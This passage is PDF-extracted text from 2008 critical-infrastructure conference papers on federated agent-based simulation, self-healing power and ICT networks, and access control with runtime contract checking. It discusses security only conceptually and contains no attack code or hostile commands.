In the literature the problem of discrete agent simulation is widely addressed. There are different frameworks that support agent and multi-agents simulation. Examples are RePast [14], JadeSIM [5], SIM AGENT [6]. All these approaches have their advantages and disadvantages. Distributed agents (e.g. JadeSIM) allow to design scalable simulation model, some of them are compliant with distributed simulation standard, but they introduce difficulties in designing and testing the simulation logic. Framework such as Repast do not use distributed agents, thus facilitating the design and testing of the simulation logic, but limiting the simulation scalability. However, Federated ABMS is independent from the technology used to implement agents. In our prototype we have decided to use RePast as discrete agent simulation framework.
80
E. Casalicchio, E. Galli, and S. Tucci
4.2
Federation of the Agent-Based Model(s) and Sector Specific Models
The implementation of the proposed federated agent-based simulation model requires the use of distributed simulation technologies. Distributed simulation allows to integrate together heterogeneous simulation model that can be world wide distributed or locally distributed. Moreover, distributed simulation enable the execution of huge simulations. If a distributed agents technology is used (see figure 3) we have, for each infrastructure, a federation composed of the agents model and of the sector specific simulation model (or more then one if needed). The federated agentbased simulation model is obtained federating together all the federations in a unique federation, the Critical Interdependent Infrastructures Federation. If a centralized agent-based simulation framework is used: the framework interacts with all the sector specific simulation models (see figure 4), while the agents interacts among them using methods invocations. The agent-based simulation framework has a unique federate ambassador, that manages the interaction between each agent and the related sector specific simulation models. Our prototype relies on HLA, the DIS standard. We have used the PoRTIco implementation [7] of the HLA interfaces. We have modified both the RePast scheduler and the scheduler of OMNeT++ to enable the interaction with PoRTIco. Then we have implemented the federate ambassador for both models. The load flow simulator used to model the power grid is a static simulation model, then the integration with PoRTIco was straightforward. 4.3
Interaction between the Agent Model and the Sector Specific Model
The design of the interaction between an agent based model and the related sector specific model is one of the main challenging problems. Critical Interdependent Infrastructures Federation (CIIF)
A1 FA
FDD CN Fed. Fed
DM1
Critical Interdependent Infrastructures Federation (CIIF) Di Discrete A Agent simulation i l i fframeworkk
Federation d i 1: 1 Communication C i i N Network(CN) k(CN) FDD CIIF
A1
An
A2 FA
FA
RTI Federation 2: Power Grid (PG)
A2 FA
FDD PG Fed Fed.
RTI
DM2 FA
FDD CIIF
Federation n
Fig. 3. The distributed agents implementation. FA is the federate ambassador, A the agent model, DM the sector specific simulation model and FDD the FOM Data Document.
FA
FA
FA
DM1
DM2
DMn
Fig. 4. The centralized agents implementation. FA is the Federate Ambassador, A the agent model, DM the sector specific simulation model and FDD the FOM Data Document.
Modeling and Simulation of Complex Interdependent Systems
81
Two aspects have to be considered: the implementation of the physical interaction between models; and the implementation of the logical relationship between the agent state and inputs (Va and Xa ) and the state variable and parameters of the detailed simulation models. Using the DIS terminology, the physical interaction is defined by the Federate Object Model (FOM). The agent model publishes, as objects, the inputs Xa and the state variables Va , while the sector specific model publishes Va as an object and Sa as an interaction. The logical relationship is implemented on the agent side. The agent implements the function fa and the mapping Ma . Each time an agent state variable changes its value, the agent model change the value of the related sector specific model variable. For example, if the network node ni is a router and ni = 0 at time t, the agent modifies, at time t, the router object published by the OMNeT++ federate. 4.4
Orchestration of the Federated Agent-Based Simulation Model
A distributed application needs an orchestrator process that manages the application logic and the distributed simulation need a process that manages the simulation logic. We named the latter process the simulation orchestrator. In federated agent-based modeling and simulation, the agent model plays the natural role of the simulation orchestrator. If a centralized agent based simulation framework is used, the simulation orchestrator can be easily implemented. For example, in RePast, where each agent is implemented by a Java class, the simulation orchestrator is implemented by the model class that coordinates the setup and running of the agent model. On the other hand, if distributed agents are used, a specific agent that works as simulation orchestrator has to be designed.
5
Concluding Remarks
This paper argued for an alternative agent-based modeling and simulation approach to study interdependent complex systems. The proposed methodology that capitalizes the advantages of ABMS and of distributed simulation, is intended as an aid to whom have the challenging task to design a simulation framework for interdependent complex systems analysis. With Federated ABMS a modeler can define an abstract model of the target compound complex system ignoring the details of the component system models (that are used as black-box). This abstraction allows the modeler to concentrate her/his effort in modeling the whole complex system and the system interdependencies. Moreover, the use of distributed simulation allows to build scalable simulation models. However, the proposed solution has some limitations. First of all, the interdependencies model has to be improved to provide more sophisticated formalism to model geographical and logical interdependencies. Furthermore, model validation mechanisms are not yet investigated.
82
E. Casalicchio, E. Galli, and S. Tucci
Acknowledgment This work is partially supported by the CRESCO Project under the contract num. ENEA/2007/1303/ FIM-INFO-AFU, but it does not necessarily represent the official position of the project itself and of its partners. Authors are solely responsible for the views, results and conclusions contained in this work.
References 1. Paderson, P., Dudenhoeffer, D., Hartley, S., Permann, M.: Critical Infrastructure Interdependencies Modeling: A survey of US and International research. Idaho National Laboratory (2006) 2. Asavathiratham, S., Leiseutre, B., Verghese, G.: The influence model. IEEE Control System Magazine (2001) 3. Balducelli, C., Bologna, S., Di Pietro, A., Vicoli, G.: Analysing Interdependencies of Critical Infrastructures using agent discrete event simulation. Int. J. Emergency Management 2(4) (2005) 4. Bonabeau, E.: Agent-based modelling: Methods and techniques for simulating human systems. In: Proc. of National Academy of Sciences of the United States of America (2002) 5. Gianni, D.: Bringing discrete event simulation concepts intro multi-agent systems. In: 10th Int. Conference on Computer Modeling and Simulation. IEEE Comp. Soc., Los Alamitos (2008) 6. Sloman, A., Logan, B.: Building cognitively rich agents using SIM Agent toolkit. Communication of ACM 43(3) (1999) 7. The poRTIco Project, http://www.porticoproject.org 8. Cardellini, V., Casalicchio, E., Galli, E.: Agent-based modeling of interdependencies in critical infrastructures through uml. In: ADS 2007: Spring Simulation Multiconference 2007/Agent Discrete Simulation 2007, Norfalk, VA, USA (2007) 9. Casalicchio, E., Galli, E., Tucci, S.: Federated agent-based modeling and simulation approach to study interdependencies in it critical infrastructures. In: DS-RT 2007: Proceedings of the IEEE International Symposium on Distributed Simulation and Real-Time Applications (DS-RT 2007), Chania, Crete, Greek. IEEE Computer Society, Los Alamitos (2007) 10. Dudenhoeffer, D., Permann, M., Manic, M.: Cims: A framework for infrastructure interdependency modeling and analysis. In: Proceedings of the Winter Simulation Conference, WSC 2006, December 3-6, pp. 478–485 (2006) 11. Gursesli, O., Desrochers, A.: Modeling Infrastructure Interdependencies using Petri Nets. In: Proc. of Int’l Conf. on Systems, Man and Cybernetics (October 2003) 12. Haimes, Y., Jiang, P.: Leontief-based model of risk in complex interconnected infrastructures. Int’l Journal of Infrastructure Systems (2001) 13. North, M.J., Macal, C.M.: Managing Business Complexity: discovery strategic solution with agent-based modeling and simulation. Oxford University Press, Oxford (2007) 14. North, M., Collier, N., Vos, J.: Experiences Creating Three Implementations of the Repast Agent Modeling Toolkit. ACM Trans. Model. Comput. Simul. 16(1), 1–25 (2006) 15. Rinaldi, S., Peerenboom, J., Kelly, T.: Identifying, Understanding, and Analyzing Critical Infrastructure Interdependencies. IEEE Control Systems 21(6), 11–25 (2001)
Modeling and Simulation of Complex Interdependent Systems
83
16. Svendsen, N.K., Wolthusen, S.D.: Multigraph Dependency Models for Heterogeneous Infrastructures, ch. 23, pp. 337–350. Springer, Heidelberg (2007) 17. Panzieri, S., Setola, R., Ulivi, G.: An agent based simulator for critical interdependent infrastructures. In: Proc. of Securing Critical Infrastructures Conf. (October 2004) 18. Gianni, D., Loukas, G., Gelembe, E.: A Simulation Framework for Investigation of Adaptive Bahaviors in Largely Populated Building Evaquation Scenarios. In: The International Workshop on Organised Adaptation in Multi-Agent Systems, at AAMAS 2008 (2008) 19. Jrad, A., O’Reilly, G., Richman, S.H., Conrad, S., Kelic, A.: Dynamic Changes In Subscriber Behavior and their impact on the telecom network in case of emergency. In: Proc. of Military Communication Conference (MILCOM 2006) (2006) 20. Zhang, P., Peeta, S., Friesz, T.: Dynamic Game Theoretic model of Multilayer Infrastructure Networks. Network and Spatial Economics 5 (2005)
Self-healing and Resilient Critical Infrastructures Rune Gustavsson and Bj¨orn St˚ ahl Blekinge Institute of Technology
[email protected],
[email protected] Abstract. The paper describes methods and tools addressing self-healing and resilience of critical infrastructures, specifically power and information networks. Our case study is based on challenges addressed in the ongoing EU project INTEGRAL aiming at integrating DES/RES in cell-based virtual utilities. We propose two experimental environments, EXP II and INSPECT to support a structured approach in identifying, implementing and monitoring suitable self-healing mechanisms entailing an increasing system resilience in our systems. Our approach is based on own results from earlier EU projects and selected approaches from other international projects such as NSF GENI in the US and EU efforts such as SmartGrids and ARECI. keywords: self-healing, resilience, critial infrastructures, interfaces, experiments
1
Background
The investigation of enabling technologies aimed at design and maintenance of future energy systems are the focus of several ongoing international R&D projects. An identified challenge is related to integrating a vast amount of Renewable Energy Sources (RES) as Distributed Energy Resources (DER). One of the international projects addressing related challenges is the EU funded SmartGrids Technological Platform1 . The project ’INTEGRAL’2 is a EU STREP project conducted within the SmartGrids umbrella and a follow up to the earlier two EU projects CRISP3 and MicroGrids4 . According to the Strategic Research Agenda (SRA) of SmartGrids, standardization, modularization and programmable functionality will enable an economy of scale of future power systems, potentially leading to lower costs of operations and more expandable systems. Instrumental in this regard is the proper design and maintenance of multidirectional communication and control systems enabling horizontal and vertical integration of system components. This will facilitate participation of customers 1 2
3 4
http://www.smartgrids.eu The work reported is partially supported by the EU project FP6-038576, Integrated ICT-platform based distribution control in electricity grids with a large share of distributed energy resources and renewable energy-sources. Started November 2007. Distributed intelligence in critical infrastructures for sustainable power: http://crisp.ecn.nl http://microgrids.power.ece.ntua.gr
R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 84–94, 2009. c Springer-Verlag Berlin Heidelberg 2009
Self-healing and Resilient Critical Infrastructures
85
and DG in system operation resulting in effective distribution control for the benefit of power quality and reliable enhancement at the connection point. The goals of the INTEGRAL project are addressing some of these challenges and is to be achieved through the following steps: 1. Define Integrated Distributed Control as a unified and overarching concept for coordination and control, not just of individual DER devices, but at the level of large-scale DER/RES aggregations. 2. Show how this can be realized by common industrial, cost-effective and standardized, state-of-the-art ICT platform solutions. 3. Demonstrate its practical validity via three field demonstrations (A, B and C) covering the full-range of different operating conditions including: (a) Normal operating conditions of DER/RES aggregations, showing their potential to reduce grid power imbalances optimize local power- and energy- management, minimize cost etc. (b) Critical operating conditions of DER/RES aggregations, showing stability also in integrated grids. (c) Emergency operating conditions, showing self-healing capabilities of DER/RES aggregations. The expected results of the project is a selected portfolio of important operational aspects of how to run DES/RES integrated with the grid, in particular: – Self-healing, fault handling and automatic grid reconfiguration in the presence of a large number of DER/RES. – Optimality of autonomous DES/RES islanded operations in interaction with higher levels of the grid. – System level security and protection of DER/RES distributed controlinformation and actions. – Balancing and trade services with the help of DER/RES clusters of cells. In this paper we introduce a couple of environments, EXP II and INSPECT, intended to support our investigations towards such ends. The tools are mainly extensions to tools from earlier EU projects such as CRISP and Alfebiite5 . The remaining part of the paper is organized as follows. In the following, Sect. 2 - Selfhealing and resilience, we identify important aspects of some of the challenges outlined above. Sect. 3 - The EXP II and INSPECT environments introduces and motivates those tools aiming at configuring and performing experiments in controlled environments. In Sect. 4 - Configurable experiments we outline our experimental frameworks. Sect. 5 - Other approaches gives a short overview of related relevant international efforts. Sect. 6 - Conclusions gives a short summary and some pointers to the future. 5
http://ww.iis.ee.ic.ac.uk/ alfebiite/ab-consortium-page.htm#Partners
86
2
R. Gustavsson and B. St˚ ahl
Self-healing and Resilience
The software- and system- engineering efforts of today are largely predicated on the notion that with sufficient efforts one can design systems to eliminate all critical flaws. Hence most techniques for software development of trustworthy systems have focused on design-time techniques: specification, modeling and analysis, validation, protocol design, etc. This approach works quite well for systems that function in a known and controlled environment, that interact with other systems over which we have considerable control, and that can be taken off-line to correct problems. However, there is an increase (as with our case) of systems that must function with an expected QoS while operating in highly unpredictable and even hostile, environments. These systems must be able to interact with other components of dubious quality and/or origin. They must function in a world where resources are not limitless or assured and where cost may be a major concern in achieving trustworthy behavior. And they might be expected to run without interruption. For such systems it becomes essential that systems become more responsible for their own behavior, adapting appropriately during run-time in-order to maintain adequate levels of service. These systems must be able to detect when problems arise and fix them automatically or semi-automatically. In the Autonomic Computing Initiative by IBM6 (2001) the concept of Self Management was introduced to address some of these challenges. Selfmanagement was subdivided into the following self* components; -configuring, -adaptive, -optimizing, -detecting, -protecting, -healing, and -organizing. Neither of those concepts are well defined, but there are several, for our purpose, useful descriptions available such as Elements of the Self-Healing System Problem Space [11], Self-healing systems survey and synthesis [4], along with reports from the EU project IST-516933 Web Services Diagnosability, Monitoring and Diagnosis (WS - DIAMOND7 ). The elements identified in [11] are: Fault model, System response, Systems completeness, and Design context. In [4] the following useful definition of self-healability is given: Self-healability. Self-healability is the property that enables a system to perceive that it is not operating correctly and, without human intervention, make the necessary adjustments to restore itself to normality. That definition can be related to the definitions of: – Dependable systems, that are defined as systems globally trustworthy with respects to their ability to always deliver its service. – Fault-tolerant systems, in which faults may occur but do not affect the performance of the system. – Resilient systems, systems that could reconfigure to harness disturbances. 6 7
http://researchweb.watson.ibm.com/autonomic/overview/challenges.html http://wsdiamond.di.unito.it/
Self-healing and Resilient Critical Infrastructures
87
But opposed these three definitions that specify the goals but not the means, self-healability aims at correcting or put right undesirable system situations. That is an active approach that operationalize the definitions stated above. In our case we will have different elements and operationalizations that depend on the critical infrastructure at hand (EMS, ICT, CBS Section 2.1). The WS DIAMOND approach follows the definition given above in the context of Webservices. Those three reports together act as background to our own approach illustrated by the EXP-II and INSPECT- environments as reported in Sec. 3 and Sec. 4. A desirable systemic property of critical infrastructures is resilience. Due to the inherent complexity of involved systems, this property is only feasible when utilizing well-chosen and implemented mechanisms supporting self-healing. The remaining part of this section discusses those issues in further detail. 2.1
Complexity Issues of Software-Intensive Systems
The INTEGRAL approach is to integrate novel and emergent ideas from Energy Management Systems (EMS) and ICT-systems in order to support DES/RES integration as well as new energy-based business models and processes. In fact, we are investigating the interactions between- as well as within- two internationally identified critical infrastructures (EMS and ICT), to support a third being Critical Business Systems (CBS). In short, challenges related to intraand interdependencies in- and between- critical infrastructures. Fig. 1 gives an overview of the INTEGRAL project. The efficiency of the active distribution networks relies on combination of three types of distributed resources: Distributed generations, Distribution grids and Demand side integration (DSI). The main operation modes addressed are: Normal operation states ICT Coordination
Demand Side Integration (DSI) SCADA/DMS
Distributed GENERATION -Internal combustion engines (gas, diesel) -Wind turbines -Other RES
Intelligent Control
Intelligent Management
Distributed LOAD -Heat pumps Solar architecture Motor controls Efficient load Mgmt
Intelligent Operation
Distribution GRID -Normal operation -Critical operation -Emergency operation
Fig. 1. Overview of the main concepts of cell-based virtual utilities addressed in the INTEGRAL- project
88
R. Gustavsson and B. St˚ ahl
Compuational Market when TGM is in a Critical State Technical Grid Management Generation, transmission and distribution
Utility-side Grid operations
Computational Market Metacoordination
Consumption and distributed generation
Stabilization coordination
Business coordination
Real-time
Real-time
Customer-side Business operations
Fig. 2. Coordination between the grid management and computational market infrastructures in virtual cell-based utilities
(Field test A), Critical operation states (Field test B) and Emergency operation states (Field test C). Fig. 2, below, illustrates the basic coordination patterns of the cell-based virtual utility outlined in Fig. 1. The figure illustrates that under normal conditions the interaction between the Technical Grid Management (TGM) and the business processes of the Computational market (CBS) is loosely coupled. It should be noted that the architecture of the information system (ICT), i.e., the glue between TGM and CBS is an invisible overlay of TGM and CBS in Fig. 2, but if the TGM enters a critical yellow state a high level Meta - coordination takes control of the overall coordination of both infrastructures. For instance, control of the computational market might utilize its market processes (buy or sell) enabling the bringing back of 4the technical grid into a Green state while maintaining quality of service. Fig. 2 also illustrates that we might have several feedback loops at different levels between- as well as within- our critical infrastructures. Those feedback loops are potentially creating non-linear system behaviors. That is, complex behaviors difficult to analyze, predict and control. We have to face the challenge of design, implementation and maintenance of resilient open complex systems. Monitoring, coordinating and controlling virtual utilities as depicted in Fig. 1 hence pose new challenges related to proper definition of system states, instrumentation and measurements. The following, Fig. 3, illustrates a state model for the electric grid part of Fig. 2. The classification scheme of states is proposed by CIGRE [20]. The CIGREs diagram shows that there could be a definition of states in terms of adequacy and stability. That definition suits us well given the analysis above. However, the only transitions among states being considered in this model are those due to consequences of natural events. Present SCADA systems have two well-known shortcomings in meeting the requirements of future DES/RES virtual utilities [Sandia8 ]. 8
http://www.sandia.gov/scada/home/htm
Self-healing and Resilient Critical Infrastructures
89
Fig. 3. Classification scheme of operational states of a power-system
– Inherent vulnerabilities, which are exploitable when SCADA systems are integrated with ’foreign networks’. – Present-day hard-wired hierarchical systems make it hard to cope with integration of new RES and DES as well as open up for new energy-based business processes. A Decoupling of SCADA systems enables virtualization at interaction points and hence self-healing as well as allowing a configurable service-based system approach. Exploits of vulnerabilities by an adversary cause attack-patterns that pose as growing threats towards our critical infrastructures [Cert Coordination Center CERT/CC9 ]. Such attack patterns can be instantiated by an adversary having the motif, means and resources to do so, but unintended exploits of vulnerabilities due to software or protocol bugs can also cause system failures or breakdowns of a potentially similar magnitude. A recent thesis on Risk assessment for power system security with regard to intentional events addresses the first aspect [18]. Important sources with regard to the first and second aspects are Common Attack Pattern Enumeration and Classification (CAPC)10 and the homepage of Common Vulnerabilities and Exposures (CVE)11 . Our approach towards system hardening has been in the same direction [14,15]. To handle state-transitions due to foreign events the concepts and states of Fig. 3 have been further elaborated, including new transitions between operating states [18]. To illustrate the complexities we have to address in maintaining adequate and normal operations of DER/RES cell-based systems as in Fig. 1 we can make the observations that we both have to identify a suitable state-diagram of the infrastructure supporting the Computational Market (CBS) and instrument/monitor the combined system in order to ascertain adequate operations. Furthermore, we should note that the system states being identified and monitored are typically not in equilibrium at any time, again due to the inherent complexity and feedback loops inherent in our system. We can eventually hope for that the system at hand is near equilibrium states most of the time to enabled 9 10 11
http://www.cert.org/certcc.html http://capec.mitre.org http://cve.mitre.org
90
R. Gustavsson and B. St˚ ahl
for controllable behavior. It might, of course, be the case that we are in states far from equilibrium. If so, a small change of parameters could result in a quick jump to another (catastrophic) state, due to bifurcation [16]. To further illustrate the complexity of our task, we have inherent uncertainties in measurements of system parameters and inherent limitations of bandwidth and computational power. In short, there is no such thing as a correct and shared view of system states of our distributed systems [12]. The bottom line is that we have to engineer our ICT-system towards having a sustainable and ensured optimal and adequate operational support for the combined systems (Fig. 2). A second conclusion is that we have to build as resilient and secure systems as possible. To that end we use modularization and virtualization techniques to embed self-healing mechanisms at different system levels. 2.2
Mechanisms of Self-healing
Self-healing, as a concept, has a long history in computing. Historic efforts have, however, mainly been related to the introduction of adaptation mechanisms in operating systems or multiprocessor systems. Self-healing could be defined as a mean to transform brittle tightly coupled systems into loosely coupled ductile systems with flexible interaction patterns (virtualization). The idea is that the flexibility of interaction could absorb (self-heal) disturbances not foreseeable at design time of the system. Having said that, it is unavoidable that self-healing mechanisms have to be engineered from carefully performed experiments. Our efforts on self-healing mechanisms have been on the low and high levels of interaction (Fig. 5). That is; on securing software execution by the use of hardening mechanisms (Section 3) and mission-level self-healing [9]. The purpose of the tool and environments introduced in Sec. 3 is to further identify and implement self-healing mechanisms at remaining system levels in a principled way.
3
The EXP II and INSPECT Environments
The EXP II and INSPECT tools and environments are continuations of our efforts towards investigate reliability, security and resilience aspects of critical infrastructures. The starting point was experiments related to the CRISP project. The following Fig. 4 depicts our experimental set-up at that time. The basic services provided by the EXP controller are Generic services (parameter settings), Runtime configuration base and Experiment specific services (including Restoration- and Start-up- services). The main results of the CRISP experiments are: – Coordination between infrastructures in ’yellow situations’. – Customized IP protocols to meet real-time network requirements. – Implementation of secure execution environments implementing self-healing mechanisms protecting execution of unreliable software.
Self-healing and Resilient Critical Infrastructures Node A
Node B
91
Node C
EXP Controller ICT Network
Electrical Power Grid Network
Fig. 4. Conceptual view of controlled experiments in CRISP of the behaviors of the critical infrastructures controlled and monitored by the nodes A, B and C
– Visualization of system status, with different points of view, to support operators understanding of system components and their interaction and behavior. A comprehensive account of the theoretical foundations and engineering aspects related to EXP is given in the thesis Informed System Protection [14]. Other results are reported in several papers in different contexts [3,6,7,8,19]. The purpose of the EXP suite of environments is to allow for controlled experiments of critical infrastructures. In fact the new EXPII environment allows us to make experiments much along the line of those envisaged by the NSF GENI12 initiative of Fig. 5. The purpose of the INSPECT tool is to explicitly model and assess information flow across component boundaries (Sec. 4). Those experiments aim at develop and test self-healing mechanisms to ensure resilience. Arguably, modeling, understanding and maintaining correct information flows is fundamental for ensuring the proper behavior of critical infrastructures [5][ARECI, Fig. 5]. From Fig. 5 we can read that there are different types of information, i.e., measurements, control information and user information involved in the systems we are addressing. Furthermore, the information has different formats and is typically transformed during its flow through the systems.
4
Configurable Experiments
The following experimental environment, based on EXP-II, is an evolution of the experimental environment of Fig. 4. The main features of our new environment under development – Support for environment manipulation during experiments, e.g., fault injections. – Virtualization at interaction points at borders. – Support for experiments on instrumentation and measurements (Network of software probes). – Support for feedback, calibration and debugging. 12
http://www.geni.net
92
R. Gustavsson and B. St˚ ahl
– Support for configuration of experimental environments. Programmable nodes and connectivity models. As complement, the INSPECT-tool allows us to model different connectivity models such as, Publish/Subscribe, Broadcast or Peer-to-Peer, supported by high-level programmable contract-based interaction protocols. The messages are indexed and transmitted by a pattern based message router. Subscriptions and notifications are based on pattern matching of contract protocols. The indexing allows for on-line monitoring or off line analysis of messages related to predefined contract based dialogues. The off-line analysis of stored messages is supported by event calculus logic. Correctness of interactions or forensics related to breakdowns of communications can thus be established. The theoretical underpinnings and their applicability are reported in [10].
5
Other Approaches
There is an increasing international interest in understanding the fundamentals of critical infrastructures. Methods and models related to systemic properties such as dependability, security, resilience, and self-healing are in focus of several international and national R&D programs. Besides the references given in Sect. 1 and Sect. 2 the following references related to self-healing are illustrative [1,2,13,17,21]. However, most of current research on this topic is on formal models and methods or frameworks. We advocate in this paper a complementary experimental approach, much in line with the NSF GENI approach. The GENI initiative by NSF designs and implements a flexible experimental platform towards understanding Future Internet and fundamental innovations in networking and distributed systems. GENI provides these capabilities through an innovative combination of techniques: virtualization, programmability, controlled communication, and modularity. Of particular interest to us is the ”Availability and Robustness of Electronic Communications Infrastructures”(ARECI) report. The ARECI13 report was conducted by AlcatelLucent technologies for the European Commission. A main contribution is the Eight Ingredient Framework of communication Infrastructures 14 . The report focuses how to mitigate vulnerabilities in the eight ingredients to avoid threats exploiting those vulnerabilities. The following Fig. 5 gives an overview of some key concepts and the proposed Network Security Framework. In our approach we make a selection of appropriate models and methods as outlined above. An overview of service - centric systems is given in a recent IEEE journal15 . A recent book by IFIP on related issues on Critical Infrastructure Protection is [5]. 13 14 15
Report to EU DG Information Society and Media. Alcatel - Lucent 2007. Bell Labs Technical Journal 11(3), 73-81 (2006). IEEE Software November-December 2007. Special issue on Service-Centric Software Systems.
3 Security Layers Applications Security Services Security Vulnerabilities
Infrastructure Security End User Plane Control Plane Management Plane
Access Control Authentication Non-repudiation Data Confidentiality Communication Security Data Integrity Availability Privacy
Self-healing and Resilient Critical Infrastructures
93
5 threats Destruction Corruption Removal Disclosure Interruption
Attacks
8 Security Dimensions
Fig. 5. The ARECI security model
6
Conclusions
We have outlined and motivated two tools and environments supporting a structured experiment based approach towards hardening critical infrastructures. The case study is the ongoing EU project INTEGRAL focusing on resilient integration of DER/RES in virtual utilities. The mitigating of vulnerabilities is supported by an engineering approach utilizing a combination of virtualization and self-healing techniques. The work reported is to a high degree work-in-progress, but with some promising results. The next steps will focus on: – Proper definitions of states and state definitions and related instrumentation and measurements. – Modeling and evaluation of information flows across boundaries. – Developing self-healing mechanisms harnessing vulnerabilities identified by CAPC and CVE.
References 1. Abdelwahed, S., Kandasamy, N., Neema, S.: A control-based framework for selfmanaging distributed computing systems. In: Proceedings of the 1st ACM SIGSOFT workshop on Self-managed systems, pp. 3–7. ACM, New York 2. Bradbury, J., Cordy, J., Dingel, B., Wermelinger, M.: A survey of self-management in dynamic software architecture specifications. In: Proceedings of the 1st ACM SIGSOFT workshop on Self-managed systems, pp. 28–33. ACM, New York (2004) 3. Fontela Garcia, M.: Interaction des rseaux transport et de distribution en prsence de productions dcentralises. Thse pour obtenir le grade de Docteur de LINP Grenoble, de 10 juillet (2008) 4. Ghosh, D., Sharman, R., Rao, R., Upadadhyaya, S.: Self-healing systems survey and synthesis. Decision Support Systems 42(4), 2164–2185 (2007) 5. Goetz, E., Shenoi, S.: Critical Infrastructure Protection. IFIP. Springer, Heidelberg (2008) 6. Gustavsson, R.: Ensuring Dependability in Service Oriented Computing. In: Proceedings of The 2006 International Conference on Security & Management (SAM 2006) at The 2006 World Congress in Computer Science, Computer Engineering, and Applied Computing (2006)
94
R. Gustavsson and B. St˚ ahl
7. Gustavsson, R.: Sustainable Virtual Utilities Based on Microgrids. In: Proceedings of the Third International Symposium on Energy, Informatics and Cybernetics (EIC 2007), Best paper Award (2007) 8. Gustavsson, R.: Ensuring Quality of Service in Service Oriented Critical Infrastructures. In: Proceedings of The International Workshop on Complex Network and Infrastructure Protection (CNIP 2006). Italian National Agency for New Technologies, Energy and the Environment (ENEA) (2006) 9. Gustavsson, R., Fredriksson, M.: Process Algebra as Support for Sustainable Systems of Services. In: Viroli, M., Omnicini, A. (eds.) Algebraic approaches for multiagent systems. Special issue of Journal of Applicable Algebra in Engineering, Communication and Computing (AAECC), vol. 16, pp. 179–203. Springer, Heidelberg (2005) 10. Knottenbelt, J., Clark, C.: Contract Related Agents. In: Toni, F., Torroni, P. (eds.) CLIMA 2005. LNCS, vol. 3900, pp. 226–242. Springer, Heidelberg (2006) 11. Koopman, P.: Elements of the Self-Healing System Problem Space. In: Proceedings of WADS 2003 Workshop on Software Architectures for Dependable Systems at ICSE 2003 International Conference on Software Engineering, Portland, Oregon (2003) 12. Lindh, J.-O.: On Observation of and Interaction in Open Distributed Systems. Doctoral Dissertation Series No. 2006:06. Blekinge Institute of Technology 13. Mamei, M., Zambonelli, F.: Self-Maintaining Overlay Data Structures for Pervasive Automic Services. In: Keller, A., Martin-Flatin, J.-P. (eds.) SelfMan 2006. LNCS, vol. 3996, pp. 58–72. Springer, Heidelberg (2006) 14. Mellstrand, P.: Informed System Protection. Doctoral Dissertation Series No. 2007:10. Blekinge Institute of Technology 15. Mellstrand, P., Gustavsson, R.: Experiment Based Validation of CIIP. In: L´ opez, J. (ed.) CRITIS 2006. LNCS, vol. 4347, pp. 15–29. Springer, Heidelberg (2006) 16. Nicolis, G., Prigogine, I.: Self-Organization in Non-Equilibrium Systems (Chaps. III and IV). J. Wiley and Sons, New York (1977) 17. Park, J., Yoo, G., Lee, E.: Proactive Self-Healing Systems based on Multi-Agent Technologies. In: Proceedings of the 2005 Third ACIS Inyernational Conference on Software Engineering Research, Management and Applications (SERA 2006). IEEE, Los Alamitos (2006) 18. Tranchita, C.: Risk Assessment for Power System Security with Regard to Intentional Event. Thesis LInstitut Polytechnique de Grenoble (2008) 19. Warmer, C., Kamphuis, R., Mellstrand, P., Gustavsson, R.: Distributed Control in Electricity Infrastructure. In: Proceedings International Conference of Future Power Systems, pp. 1–7, ISBN: 90-78205-02-4INSPEC Accession Number: 9045591 20. CIGRE WG 38-03: Power Systems Security Assessment: A Position Paper. CIGRE Electra, No. 175, December 1997, pp. 53–77 (1997) 21. Weys, D., Haesevoets, R., Eylen, B., Helleboogh, A., Holvoet, T., Joosen, W.: Endogenous versus exogenous self-management. In: Proceedings of the 2008 international workshop on software engineering for adaptive and self-managing systems, pp. 41–48 (2008) ISBN: 978-1-60568-037-1
Critical Infrastructures Security Modeling, Enforcement and Runtime Checking Anas Abou El Kalam1 and Yves Deswarte2 1
Universit´e de Toulouse, IRIT - CNRS, ENSEEIHT - INPT
[email protected] 2 Universit´e de Toulouse, LAAS-CNRS {yves.deswarte}@laas.fr
Abstract. This paper identifies the most relevant security requirements for critical infrastructures (CIs), and according to these requirements, proposes an access control framework. The latter supports the CI security policy modeling and enforcement. Then, it proposes a runtime model checker for the interactions between the organizations forming the CIs, to verify their compliance with previously signed contracts. In this respect, not only our security framework handles secure local and remote accesses, but also audits and verifies the different interactions. In particular, remote accesses are controlled, every deviation from the signed contracts triggers an alarm, the concerned parties are notified, and audits can be used as evidence for sanctioning the party responsible for the deviation. Keywords: Security policies and models, access control enforcement, security of critical infrastructures, runtime model checking.
1 Introduction Protecting Critical Infrastructures (CIs) becomes one of the biggest concerns for the safety of our Society. In fact, on the one hand, these infrastructures grow up and become more and more complex; on the other hand, the resilience and security issues are not completely understood, mainly due to their hybrid composition. For example, traditional SCADA systems were not designed to be widely distributed and remotely accessed; they grew-up standalone, closed, with only physical security in mind. Nowadays, the situation is quite different and interdependencies with other infrastructures require openness and interoperability provision. Moreover, the 9/11 events, the North America blackout (2003) [1] and many other examples demonstrate the complex interactions between physical and cyber-infrastructures and emphasize how protecting these CIs is quite important. The international community is worried about these problems and many efforts are deployed to manage the CI-related risks. For example, in the USA, the NERC has organized a Cyber Security Urgent Action (NERC UA 1200 and 1300), that resulted in defining a set of standards CIP–001–1 to CIP–009–1) [2]. In this context, it is important to note that all these committees and reports claim that security-related issues are among the most serious problems in CIs. For example, the US Department of Homeland Security has set up an experiment where hackers attacked the software controlling a power generator, which ended in the destruction of the generator R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 95–108, 2009. c Springer-Verlag Berlin Heidelberg 2009
96
A.A. El Kalam and Y. Deswarte
[3]. Not only this experiment proves that cyber-attacks on CIs can be the next form of terrorism, but also reminds that code written for CIs can be as vulnerable as any other kind of software and that these vulnerabilities can be exploited to cause physical as well as logical damage. Furthermore, several studies have shown that one of the most common problems of CI protection is the lack of adequate security policies, in particular in modern SCADA environments [4]. In this paper, we first identify the security requirements of CIs (in Section 2). Then, in Section 3 we present some security models and policies and we discuss their applicability to CIs. We will show that deriving a security policy and implementing it with traditional security mechanisms is not efficient in our context. In fact, if these mechanisms are able to enforce permissions, they do not efficiently enforce obligations and explicit prohibitions, while these kinds of rules are very important in CIs. Moreover, in such systems, it is crucial to audit the different actions and alarms. In fact, not only we should be able to keep an audit trail, but we also should precisely identify if a certain CI respects its obligations and complies with its expected behavior. For these reasons, in Section 4 we present a runtime model checker (based on timed automata) that is able to verifiy the well execution of the interaction protocol between the different organizations, according to the contracts they have previously signed. Finally, in Section 5 we draw our conclusions and we present open issues in this area. 